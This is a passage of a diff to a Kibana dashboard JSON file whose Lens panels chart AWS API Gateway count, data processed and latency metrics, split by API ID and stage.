"indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", + "id": "metrics-*", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ff2c6fd1-df0b-409d-a7e7-033a129edba3": { + "columnOrder": [ + "f87d2d15-ecd3-4cf3-85e5-911976418f35", + 
"21bcc448-3bbc-4949-8471-40e126445935", + "11242c77-c1e8-482f-a8ab-d14342367450" + ], + "columns": { + "11242c77-c1e8-482f-a8ab-d14342367450": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of aws.apigateway.metrics.Count.sum", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 0 } - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.Count.sum" + } }, - "21bcc448-3bbc-4949-8471-40e126445935": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.Count.sum" + }, + "21bcc448-3bbc-4949-8471-40e126445935": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" }, - "f87d2d15-ecd3-4cf3-85e5-911976418f35": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of aws.dimensions.ApiId + 1 other", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "11242c77-c1e8-482f-a8ab-d14342367450", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "aws.dimensions.Stage" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "aws.dimensions.ApiId" - } + "scale": "interval", + "sourceField": "@timestamp" }, - "incompleteColumns": {}, - "sampling": 1 - } + "f87d2d15-ecd3-4cf3-85e5-911976418f35": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of aws.dimensions.ApiId + 1 other", + "operationType": "terms", + "params": { + 
"exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "11242c77-c1e8-482f-a8ab-d14342367450", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "aws.dimensions.Stage" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.ApiId" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.Count.sum", - "key": "aws.apigateway.metrics.Count.sum", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.Count.sum" - } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.Count.sum", + "key": "aws.apigateway.metrics.Count.sum", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.Count.sum" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "negate": false, - "params": [ - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.ApiId", - "index": "metrics-*", - "key": "aws.dimensions.ApiId", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.ApiId" - } + "meta": { + "alias": null, + "disabled": false, + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.ApiId", + "index": "metrics-*", + "key": "aws.dimensions.ApiId", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.ApiId" } + } + }, + { + "meta": { + "alias": 
null, + "disabled": false, + "field": "aws.dimensions.Stage", + "index": "metrics-*", + "key": "aws.dimensions.Stage", + "negate": false, + "type": "exists", + "value": "exists" }, - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Stage", - "index": "metrics-*", - "key": "aws.dimensions.Stage", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Stage" - } + "query": { + "exists": { + "field": "aws.dimensions.Stage" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Resource", - "index": "metrics-*", - "key": "aws.dimensions.Resource", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Resource" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Resource", + "index": "metrics-*", + "key": "aws.dimensions.Resource", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Resource" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Method", - "index": "metrics-*", - "key": "aws.dimensions.Method", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Method" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Method", + "index": "metrics-*", + "key": "aws.dimensions.Method", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Method" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Route", - 
"index": "metrics-*", - "key": "aws.dimensions.Route", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Route" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Route", + "index": "metrics-*", + "key": "aws.dimensions.Route", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Route" } } - ], - "relation": "AND", - "type": "combined" - }, - "query": {} - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "11242c77-c1e8-482f-a8ab-d14342367450" - ], - "layerId": "ff2c6fd1-df0b-409d-a7e7-033a129edba3", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "f87d2d15-ecd3-4cf3-85e5-911976418f35", - "xAccessor": "21bcc448-3bbc-4949-8471-40e126445935" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true + } + ], + "relation": "AND", + "type": "combined" }, - "valueLabels": "hide" + "query": {} } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + 
"yRight": 0 + }, + "layers": [ + { + "accessors": [ + "11242c77-c1e8-482f-a8ab-d14342367450" + ], + "layerId": "ff2c6fd1-df0b-409d-a7e7-033a129edba3", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "f87d2d15-ecd3-4cf3-85e5-911976418f35", + "xAccessor": "21bcc448-3bbc-4949-8471-40e126445935" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - "enhancements": {}, - "hidePanelTitles": false + "title": "", + "type": "lens", + "visualizationType": "lnsXY" }, - "title": "Count" + "enhancements": {}, + "hidePanelTitles": false }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 15, - "i": "e71f676d-e0d3-40a3-9439-34de613469f4", - "w": 24, - "x": 24, - "y": 7 - }, - "panelIndex": "e71f676d-e0d3-40a3-9439-34de613469f4", - "embeddableConfig": { - "attributes": { - "title": "", - "description": "", - "visualizationType": "lnsXY", - "type": "lens", - "references": [ - { - "type": "index-pattern", - "id": "metrics-*", - "name": "indexpattern-datasource-layer-da960427-d6bb-4f17-a5ac-9be25356186a" - } - ], - "state": { - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "53bb15bf-1d19-4aaa-be68-5015b194e60b" - ], - "layerId": "da960427-d6bb-4f17-a5ac-9be25356186a", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", - "xAccessor": "7af933af-8c3e-47b8-9e15-9cd504966672" - } - ], - "legend": { - "isVisible": 
true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yTitle": "" + "title": "Count" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "e71f676d-e0d3-40a3-9439-34de613469f4", + "w": 24, + "x": 24, + "y": 7 + }, + "panelIndex": "e71f676d-e0d3-40a3-9439-34de613469f4", + "embeddableConfig": { + "attributes": { + "title": "", + "description": "", + "visualizationType": "lnsXY", + "type": "lens", + "references": [ + { + "type": "index-pattern", + "id": "metrics-*", + "name": "indexpattern-datasource-layer-da960427-d6bb-4f17-a5ac-9be25356186a" + } + ], + "state": { + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "query": { - "language": "kuery", - "query": "" + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "filters": [ + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.DataProcessed.avg", - "key": "aws.apigateway.metrics.DataProcessed.avg", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.DataProcessed.avg" - } - }, - "$state": { - "store": "appState" + "accessors": [ + "53bb15bf-1d19-4aaa-be68-5015b194e60b" + ], + "layerId": "da960427-d6bb-4f17-a5ac-9be25356186a", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", + "xAccessor": "7af933af-8c3e-47b8-9e15-9cd504966672" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": 
true + }, + "valueLabels": "hide", + "yTitle": "" + }, + "query": { + "language": "kuery", + "query": "" + }, + "filters": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.DataProcessed.avg", + "key": "aws.apigateway.metrics.DataProcessed.avg", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.DataProcessed.avg" } }, - { - "meta": { - "alias": null, - "disabled": false, - "negate": false, - "params": [ - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.ApiId", - "index": "metrics-*", - "key": "aws.dimensions.ApiId", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.ApiId" - } + "$state": { + "store": "appState" + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.ApiId", + "index": "metrics-*", + "key": "aws.dimensions.ApiId", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.ApiId" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Stage", + "index": "metrics-*", + "key": "aws.dimensions.Stage", + "negate": false, + "type": "exists", + "value": "exists" }, - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Stage", - "index": "metrics-*", - "key": "aws.dimensions.Stage", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Stage" - } + "query": { + "exists": { + "field": "aws.dimensions.Stage" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Method", - "index": "metrics-*", - "key": "aws.dimensions.Method", - "negate": true, - 
"type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Method" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Method", + "index": "metrics-*", + "key": "aws.dimensions.Method", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Method" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Resource", - "index": "metrics-*", - "key": "aws.dimensions.Resource", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Resource" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Resource", + "index": "metrics-*", + "key": "aws.dimensions.Resource", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Resource" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Route", - "index": "metrics-*", - "key": "aws.dimensions.Route", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Route" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Route", + "index": "metrics-*", + "key": "aws.dimensions.Route", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Route" } } - ], - "relation": "AND", - "type": "combined" - }, - "query": {}, - "$state": { - "store": "appState" - } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {}, + "$state": { + "store": "appState" } - ], - "datasourceStates": { - "formBased": { - "layers": { - "da960427-d6bb-4f17-a5ac-9be25356186a": { - 
"columnOrder": [ - "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", - "7af933af-8c3e-47b8-9e15-9cd504966672", - "53bb15bf-1d19-4aaa-be68-5015b194e60b" - ], - "columns": { - "53bb15bf-1d19-4aaa-be68-5015b194e60b": { - "dataType": "number", - "isBucketed": false, - "label": "Average of aws.apigateway.metrics.DataProcessed.avg", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } + } + ], + "datasourceStates": { + "formBased": { + "layers": { + "da960427-d6bb-4f17-a5ac-9be25356186a": { + "columnOrder": [ + "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", + "7af933af-8c3e-47b8-9e15-9cd504966672", + "53bb15bf-1d19-4aaa-be68-5015b194e60b" + ], + "columns": { + "53bb15bf-1d19-4aaa-be68-5015b194e60b": { + "dataType": "number", + "isBucketed": false, + "label": "Average of aws.apigateway.metrics.DataProcessed.avg", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0 } - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.DataProcessed.avg" + } }, - "7af933af-8c3e-47b8-9e15-9cd504966672": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.DataProcessed.avg" + }, + "7af933af-8c3e-47b8-9e15-9cd504966672": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" }, - "c6eaba88-8446-4a94-b32b-e0f6cc784fc2": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of aws.dimensions.ApiId + 1 other", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": 
false, - "missingBucket": false, - "orderBy": { - "columnId": "53bb15bf-1d19-4aaa-be68-5015b194e60b", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "aws.dimensions.Stage" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "aws.dimensions.ApiId" - } + "scale": "interval", + "sourceField": "@timestamp" }, - "incompleteColumns": {}, - "sampling": 1 - } + "c6eaba88-8446-4a94-b32b-e0f6cc784fc2": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of aws.dimensions.ApiId + 1 other", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "53bb15bf-1d19-4aaa-be68-5015b194e60b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "aws.dimensions.Stage" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.ApiId" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "internalReferences": [], - "adHocDataViews": {} - } - }, - "enhancements": {}, - "hidePanelTitles": false + } + }, + "internalReferences": [], + "adHocDataViews": {} + } }, - "title": "Data Processed" + "enhancements": {}, + "hidePanelTitles": false }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 15, - "i": "424aa31b-dcf7-4bde-8dc7-97f9fcf2bcc6", - "w": 24, - "x": 0, - "y": 22 - }, - "panelIndex": "424aa31b-dcf7-4bde-8dc7-97f9fcf2bcc6", - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "name": "indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", - "id": "metrics-*", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "ff2c6fd1-df0b-409d-a7e7-033a129edba3": { - "columnOrder": [ - 
"f87d2d15-ecd3-4cf3-85e5-911976418f35", - "21bcc448-3bbc-4949-8471-40e126445935", - "11242c77-c1e8-482f-a8ab-d14342367450" - ], - "columns": { - "11242c77-c1e8-482f-a8ab-d14342367450": { - "dataType": "number", - "isBucketed": false, - "label": "Average of aws.apigateway.metrics.Latency.avg", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 2, - "suffix": "ms" - } + "title": "Data Processed" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "424aa31b-dcf7-4bde-8dc7-97f9fcf2bcc6", + "w": 24, + "x": 0, + "y": 22 + }, + "panelIndex": "424aa31b-dcf7-4bde-8dc7-97f9fcf2bcc6", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "name": "indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", + "id": "metrics-*", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ff2c6fd1-df0b-409d-a7e7-033a129edba3": { + "columnOrder": [ + "f87d2d15-ecd3-4cf3-85e5-911976418f35", + "21bcc448-3bbc-4949-8471-40e126445935", + "11242c77-c1e8-482f-a8ab-d14342367450" + ], + "columns": { + "11242c77-c1e8-482f-a8ab-d14342367450": { + "dataType": "number", + "isBucketed": false, + "label": "Average of aws.apigateway.metrics.Latency.avg", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "ms" } - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.Latency.avg" + } }, - "21bcc448-3bbc-4949-8471-40e126445935": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.Latency.avg" + }, + 
"21bcc448-3bbc-4949-8471-40e126445935": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" }, - "f87d2d15-ecd3-4cf3-85e5-911976418f35": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of aws.dimensions.ApiId + 1 other", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "11242c77-c1e8-482f-a8ab-d14342367450", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "aws.dimensions.Stage" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "aws.dimensions.ApiId" - } + "scale": "interval", + "sourceField": "@timestamp" }, - "incompleteColumns": {}, - "sampling": 1 - } + "f87d2d15-ecd3-4cf3-85e5-911976418f35": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of aws.dimensions.ApiId + 1 other", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "11242c77-c1e8-482f-a8ab-d14342367450", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "aws.dimensions.Stage" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.ApiId" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.Latency.avg", - "key": "aws.apigateway.metrics.Latency.avg", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.Latency.avg" - } + } + 
}, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.Latency.avg", + "key": "aws.apigateway.metrics.Latency.avg", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.Latency.avg" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "negate": false, - "params": [ - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.ApiId", - "index": "metrics-*", - "key": "aws.dimensions.ApiId", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.ApiId" - } + "meta": { + "alias": null, + "disabled": false, + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.ApiId", + "index": "metrics-*", + "key": "aws.dimensions.ApiId", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.ApiId" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Stage", + "index": "metrics-*", + "key": "aws.dimensions.Stage", + "negate": false, + "type": "exists", + "value": "exists" }, - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Stage", - "index": "metrics-*", - "key": "aws.dimensions.Stage", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Stage" - } + "query": { + "exists": { + "field": "aws.dimensions.Stage" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Method", - "index": "metrics-*", - "key": "aws.dimensions.Method", - "negate": true, - "type": "exists", - "value": "exists" - }, 
- "query": { - "exists": { - "field": "aws.dimensions.Method" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Method", + "index": "metrics-*", + "key": "aws.dimensions.Method", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Method" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Resource", - "index": "metrics-*", - "key": "aws.dimensions.Resource", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Resource" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Resource", + "index": "metrics-*", + "key": "aws.dimensions.Resource", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Resource" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Route", - "index": "metrics-*", - "key": "aws.dimensions.Route", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Route" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Route", + "index": "metrics-*", + "key": "aws.dimensions.Route", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Route" } } - ], - "relation": "AND", - "type": "combined" - }, - "query": {} - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "CURVE_MONOTONE_X", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - 
"x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "11242c77-c1e8-482f-a8ab-d14342367450" - ], - "layerId": "ff2c6fd1-df0b-409d-a7e7-033a129edba3", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "f87d2d15-ecd3-4cf3-85e5-911976418f35", - "xAccessor": "21bcc448-3bbc-4949-8471-40e126445935" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true + } + ], + "relation": "AND", + "type": "combined" }, - "valueLabels": "hide" + "query": {} } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "CURVE_MONOTONE_X", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "11242c77-c1e8-482f-a8ab-d14342367450" + ], + "layerId": "ff2c6fd1-df0b-409d-a7e7-033a129edba3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "f87d2d15-ecd3-4cf3-85e5-911976418f35", + "xAccessor": "21bcc448-3bbc-4949-8471-40e126445935" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - "enhancements": {}, - "hidePanelTitles": false + "title": "", + "type": "lens", + "visualizationType": "lnsXY" }, - "title": "Latency" + "enhancements": {}, + 
"hidePanelTitles": false }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 15, - "i": "21ea8ee2-05f0-4a71-a46a-fe4ab6c3db94", - "w": 24, - "x": 24, - "y": 22 - }, - "panelIndex": "21ea8ee2-05f0-4a71-a46a-fe4ab6c3db94", - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "name": "indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", - "id": "metrics-*", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "ff2c6fd1-df0b-409d-a7e7-033a129edba3": { - "columnOrder": [ - "f87d2d15-ecd3-4cf3-85e5-911976418f35", - "21bcc448-3bbc-4949-8471-40e126445935", - "11242c77-c1e8-482f-a8ab-d14342367450" - ], - "columns": { - "11242c77-c1e8-482f-a8ab-d14342367450": { - "dataType": "number", - "isBucketed": false, - "label": "Average of aws.apigateway.metrics.IntegrationLatency.avg", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 2, - "suffix": "ms" 